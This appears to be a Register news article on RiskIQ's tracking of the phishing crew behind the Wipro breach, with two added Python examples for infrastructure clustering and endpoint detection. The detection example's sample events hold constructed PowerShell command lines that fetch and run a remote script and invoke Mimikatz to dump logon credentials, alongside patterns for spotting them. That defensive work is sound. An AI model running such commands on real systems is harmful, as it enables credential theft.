Wipro wasn't a one-off: Same hacking crew targeted scores of firms, big and small – researchers

Thanks in large part to a counter-phishing product. Doh!

The criminals behind the Wipro phishing attack from earlier this year also targeted Western Union, Expedia, Rackspace and a whole host of other big companies, according to threat intel outfit RiskIQ.

In a report published this morning the firm said the Wipro attackers were running a much larger series of phishing campaigns, aimed at extracting cash from hapless businesses whose files had been forcibly encrypted.

Indian outsourcing behemoth Wipro discovered earlier this year that its email systems had been compromised, seemingly for some time, by black hats using it as a jumping-off point to target Wipro customers.


RiskIQ said it had “identified at least five distinct attack campaigns based off analysis of the actor-owned infrastructure,” having analysed “both Passive DNS and SSL certificate data”.

Targeted companies included Western Union, Moneygram, Rackspace, Capgemini, Wipro, Staples, Costco, Expedia, Virgin Pulse, Messagelab and Sendgrid.

A reasonably sophisticated group* with some knowledge of how to cover its tracks was behind the attacks – and was said to have used off-the-shelf phishing templates to compromise the Indian outsourcer, as well as hitting a number of other companies.

Those templates appeared to have been drawn from a counter-phishing training product marketed by Swiss pentesting firm Lucy Security – though Lucy has strenuously denied to The Register that one of its software products was used in the Wipro compromise.

Templates from a Lucy counter-phishing training product were identical to those used by the Wipro attackers, according to RiskIQ, which said in its report: "Lucy comes with a variety of default phishing templates, and one of these templates was used during most of the phishing campaigns – including the now notorious Wipro case."

"There is no evidence that [the hackers] used Lucy software, other than using the template design, and our analysis demonstrates significant evidence to the contrary," said Colin Bastable, chief exec of Lucy Security. FireEye, which also investigated the group behind the Wipro hack following infosec journalist Brian Krebs' work to reveal it in the first place, concurred with Bastable in that Lucy's software itself did not appear to have been used by the crims.

FireEye's CTO of strategic services, Charles Carmakal, told The Register: "The actor commonly uses public or commercially available tools that may already exist in victim environments, such as ScreenConnect, EMCO Remote Installer, CleverControl, Teramind, and Kaseya, to maintain persistence and move laterally."

PowerShell and Mimikatz

The Wipro attackers first appeared in May 2016, according to RiskIQ, and went in four distinct waves, mainly targeting services-based businesses such as digital marketing agencies, IT firms, point-of-sale and payment transfer companies and gift card providers. Later waves of attacks retargeted some of the same companies, though each wave saw around 20 to 25 separate businesses being phished.

Those phishing pages were online for just a couple of days – long enough for targeted victims to see the pages but short enough, so the attackers hoped, to evade detection and takedown.
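The two infrastructure points above (campaign clustering from passive DNS and certificate data, and phishing pages that live only a couple of days) can be worked through on a small constructed dataset. This is an added example, not code or data from RiskIQ or this article: the hostnames, IPs, dates and certificate fingerprints are invented placeholders, and the clustering rule (hosts sharing a resolving IP or a TLS certificate belong to the same actor-owned set) is the pivot the report describes, implemented here with union-find.

```python
"""
Added example, not from the RiskIQ report or this article: pivoting on actor-owned
infrastructure the way the report describes (shared resolving IPs from passive DNS,
shared TLS certificates) and measuring how long each phishing host was live from
passive DNS first-seen/last-seen dates. Every record below is constructed; the
hostnames, IPs and certificate fingerprints are invented placeholders.
"""
from collections import defaultdict
from datetime import datetime

# Constructed passive DNS records: (hostname, resolved IP, first seen, last seen)
PDNS = [
    ("login-payroll.example",  "203.0.113.10",  "2019-02-01", "2019-02-03"),
    ("hr-portal.example",      "203.0.113.10",  "2019-02-02", "2019-02-04"),
    ("secure-mail.example",    "203.0.113.11",  "2019-02-10", "2019-02-11"),
    ("corp-benefits.example",  "198.51.100.20", "2018-11-01", "2019-03-01"),
]

# Constructed certificate observations: (hostname, certificate fingerprint)
CERTS = [
    ("login-payroll.example", "sha1:aa11"),
    ("hr-portal.example",     "sha1:aa11"),
    ("secure-mail.example",   "sha1:aa11"),   # different IP, same cert: same actor
    ("corp-benefits.example", "sha1:bb22"),
]


def build_clusters(pdns, certs):
    """Group hostnames that share a resolving IP or a certificate, transitively.

    Union-find: every hostname starts as its own set; each shared IP and each
    shared certificate merges the sets of the hosts that use it. Returns the
    clusters largest first (ties broken alphabetically).
    """
    parent = {}

    def find(x):
        parent.setdefault(x, x)
        while parent[x] != x:
            parent[x] = parent[parent[x]]   # path halving
            x = parent[x]
        return x

    def union(a, b):
        parent[find(a)] = find(b)

    shared = defaultdict(list)
    for host, ip, _, _ in pdns:
        find(host)                          # register even singleton hosts
        shared[("ip", ip)].append(host)
    for host, fp in certs:
        find(host)
        shared[("cert", fp)].append(host)
    for hosts in shared.values():
        for other in hosts[1:]:
            union(hosts[0], other)

    clusters = defaultdict(set)
    for host in list(parent):
        clusters[find(host)].add(host)
    return sorted(clusters.values(), key=lambda s: (-len(s), sorted(s)))


def live_days(pdns):
    """Days between first and last passive DNS sighting for each hostname."""
    fmt = "%Y-%m-%d"
    return {
        host: (datetime.strptime(last, fmt) - datetime.strptime(first, fmt)).days
        for host, _, first, last in pdns
    }


def short_lived(pdns, max_days=3):
    """Hostnames live for at most max_days: the few-day window the article describes."""
    return {host for host, days in live_days(pdns).items() if days <= max_days}


if __name__ == "__main__":
    days = live_days(PDNS)
    flagged = short_lived(PDNS)
    for cluster in build_clusters(PDNS, CERTS):
        print("cluster:", ", ".join(sorted(cluster)))
        for host in sorted(cluster):
            note = " (short-lived)" if host in flagged else ""
            print(f"  {host:24s} live {days[host]:3d} days{note}")
```

Three of the four hosts fall into one cluster even though one of them never shared an IP with the others: the reused certificate ties it in, which is why certificate data is worth collecting alongside passive DNS. The long-lived host with its own certificate stays separate. With real data, treat the `max_days` threshold as tunable and remember that a page taken down quickly still leaves first-seen/last-seen evidence in passive DNS after the host itself is gone.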

Having phished their way into the target company, the attackers would then deploy and use the ScreenConnect remote control tool, as well as the EMCO Remote Installer. Once ScreenConnect was in place on a machine inside the target, the hackers then ran "small PowerShell scripts to rename the ScreenConnect product name on compromised machines."

That PowerShell script, named Babysharkpro by the criminals, would also execute a custom Mimikatz build in memory, which would dump the credentials of recently logged-in users on that particular device. Mimikatz is rather popular at the moment among black hats, as a number of telcos around the world recently found out the hard way.

"The fact that it was custom-compiled makes it an interesting sample – it does not ever hit the filesystem, as it is executed in memory only," commented RiskIQ.
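The endpoint side of this tradecraft (a legitimate remote-control client whose product name has been rewritten, and PowerShell launched from that client to run a credential dumper in memory) is detectable from process-creation telemetry without ever seeing the Mimikatz binary on disk. The following is an added example, not code from RiskIQ, FireEye or The Register, and not the actors' script: it runs three detection rules over constructed Sysmon Event ID 1 style records. The field names (Image, CommandLine, ParentImage, OriginalFileName, Company, Product, Description) are Sysmon's; the events, paths and the text of the malicious command lines are invented, and the assumption that the rename touched the product/description strings but not the executable's own name is an assumption of this example, not a finding from the report.

```python
"""
Added example, not from RiskIQ, FireEye or this article: detection logic for the
behaviours described above, run over constructed Sysmon-style process-creation
events. The events, paths and command lines are invented; the indicator strings
are assumptions about what a Mimikatz-in-memory loader looks like, not quotes
from the actors' "Babysharkpro" script.
"""
import base64
import re


def _enc(cmd: str) -> str:
    """Base64 of UTF-16LE text, the encoding powershell.exe -EncodedCommand expects."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SC_DIR = r"C:\Program Files (x86)\ScreenConnect Client (a1b2c3)"
RENAMED_DIR = r"C:\Program Files (x86)\Windows Update Helper (a1b2c3)"

# Constructed Sysmon Event ID 1 records (subset of fields).
EVENTS = [
    {   # legitimate ScreenConnect client: binary metadata and product name agree
        "RecordId": 1, "Image": SC_DIR + r"\ScreenConnect.ClientService.exe",
        "OriginalFileName": "ScreenConnect.ClientService.exe",
        "Company": "ScreenConnect Software", "Product": "ScreenConnect",
        "Description": "ScreenConnect Client Service",
        "CommandLine": '"' + SC_DIR + r'\ScreenConnect.ClientService.exe"',
        "ParentImage": r"C:\Windows\System32\services.exe",
    },
    {   # same client after its product/description strings were rewritten
        "RecordId": 2, "Image": RENAMED_DIR + r"\ScreenConnect.ClientService.exe",
        "OriginalFileName": "ScreenConnect.ClientService.exe",
        "Company": "ScreenConnect Software", "Product": "Windows Update Helper",
        "Description": "Windows Update Helper Service",
        "CommandLine": '"' + RENAMED_DIR + r'\ScreenConnect.ClientService.exe"',
        "ParentImage": r"C:\Windows\System32\services.exe",
    },
    {   # remote-control client spawning PowerShell that stages a dumper in memory
        "RecordId": 3, "Image": PS, "OriginalFileName": "PowerShell.EXE",
        "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                       ".DownloadString('http://198.51.100.7/bsp.ps1'); "
                       "Invoke-Mimikatz -Command 'sekurlsa::logonpasswords'\"",
        "ParentImage": RENAMED_DIR + r"\ScreenConnect.WindowsClient.exe",
    },
    {   # same payload hidden behind -EncodedCommand
        "RecordId": 4, "Image": PS, "OriginalFileName": "PowerShell.EXE",
        "CommandLine": "powershell.exe -NoP -EncodedCommand " + _enc(
            "[Reflection.Assembly]::Load($b); Invoke-Mimikatz -Command 'sekurlsa::logonpasswords'"),
        "ParentImage": SC_DIR + r"\ScreenConnect.WindowsClient.exe",
    },
    {   # ordinary scheduled PowerShell job: must not alert
        "RecordId": 5, "Image": PS, "OriginalFileName": "PowerShell.EXE",
        "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
    },
]

SC = re.compile(r"screenconnect", re.I)
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe")
CRED_DUMP = re.compile(r"sekurlsa::|lsadump::|invoke-mimikatz|mimikatz", re.I)
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def effective_command_line(ev: dict) -> str:
    """CommandLine plus the decoded -EncodedCommand payload, if one is present."""
    cmd = ev.get("CommandLine", "")
    m = ENCODED.search(cmd)
    if m:
        try:
            cmd += " " + base64.b64decode(m.group(1)).decode("utf-16le", "ignore")
        except ValueError:          # not valid base64: keep the raw command line
            pass
    return cmd


def detect(events):
    """Return (rule, RecordId) pairs for every event matching one of three rules."""
    hits = []
    for ev in events:
        rid = ev["RecordId"]
        meta = ev.get("OriginalFileName", "") + " " + ev.get("Company", "")
        visible = ev.get("Product", "") + " " + ev.get("Description", "")
        # Rule 1: PE metadata says ScreenConnect but the user-facing strings do not
        if SC.search(meta) and not SC.search(visible):
            hits.append(("renamed_screenconnect", rid))
        child, parent = basename(ev.get("Image", "")), basename(ev.get("ParentImage", ""))
        # Rule 2: the remote-control client launching a shell
        if child in SHELLS and SC.search(parent):
            hits.append(("screenconnect_spawns_shell", rid))
        # Rule 3: credential-dump tooling in the (decoded) command line
        if child in SHELLS and CRED_DUMP.search(effective_command_line(ev)):
            hits.append(("in_memory_credential_dump", rid))
    return hits


if __name__ == "__main__":
    for rule, rid in detect(EVENTS):
        print(f"{rule:28s} record {rid}")
```

Rule 1 is the one that survives the rename: whoever edits the product name in the registry or the service display name does not usually rebuild the PE version resource, so OriginalFileName and Company still say ScreenConnect while Product and Description say something else. Rule 3 decodes `-EncodedCommand` before matching, because a command line that only carries base64 will never match a plaintext indicator. Legitimate administrators also run ScreenConnect and PowerShell, so rule 2 alone is a lead rather than a verdict; the combination of all three on one host is what the RiskIQ narrative describes.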

RiskIQ's previous research includes a plausible explanation for the British Airways hack (compromised JS on the airline's credit card payment page) as well as detailed tracking of miscreants using the Magecart malware. ®


* Although RiskIQ named what appeared to be two individuals it had identified from Whois records linked to domains used to host early iterations of their ransomware's command-and-control infrastructure, El Reg has decided not to reproduce those names or details. There is, after all, little to suggest that those identities themselves hadn't been stolen by the criminals.
